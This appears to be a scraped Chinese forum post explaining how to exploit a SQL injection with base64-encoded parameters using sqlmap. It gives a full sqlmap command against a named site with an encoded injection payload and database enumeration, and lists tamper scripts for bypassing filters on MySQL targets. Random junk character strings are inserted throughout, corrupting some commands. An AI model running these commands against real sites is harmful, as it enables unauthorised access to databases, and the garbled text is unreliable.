WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
6 q/ r8 @% R+ O7 C d( m) N, x: W5 [
sqlmap的tamper里有个base64encode.py( m9 H# j, | o( k/ }4 |0 M; @
" E2 O- b2 F+ x* L) B9 r
使用如下( l, A) |' w9 Q) `! V2 x
6 \$ B# A) b+ l, m. F
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs4 N# Y$ o+ k& E; p# f Y C
4 g& q8 \3 G! p& d# }* ~+ g. p4 D! ^9 t" h; k* W
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
" P9 E9 l4 C+ L2 i) z$ g6 N4 i; Z
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
( [8 r: {9 X8 `
7 A. i! P* z4 S* Nspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
/ J0 U* J' a# z1 u# W$ @. L) Aspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
5 X) `. @& g/ Z' a. d6 M. W ^首先确定目标数据库版本,然后选择相应的脚本。
6 Y. n- r. Q# q4 q9 U9 ?-v 3 --batch --tamper "space2hash.py"" h* H$ E% j4 g$ d" }1 |
$ _/ E0 V% G6 d: r, d. }还有其他一些插件:
2 r8 ?$ c" g5 |- _9 m6 Dencodes编码 ——charencode.py
; e) p( ]5 q; D$ W" G0 ^* T& u5 pbase64编码 —— base64encode.py
+ C# V: d7 b- ]# K替换空格和关键字 —— halfversionedmorekeywords.py0 o: n+ y; M$ M( L: Y% D
|
2 M4 U, I5 L* J$ m) s5 i& l/ Q2 u7 |2 p. G$ u
# Y+ A4 S: M/ q S4 g. k4 \
/ @/ q: e$ m, l1 A+ Y |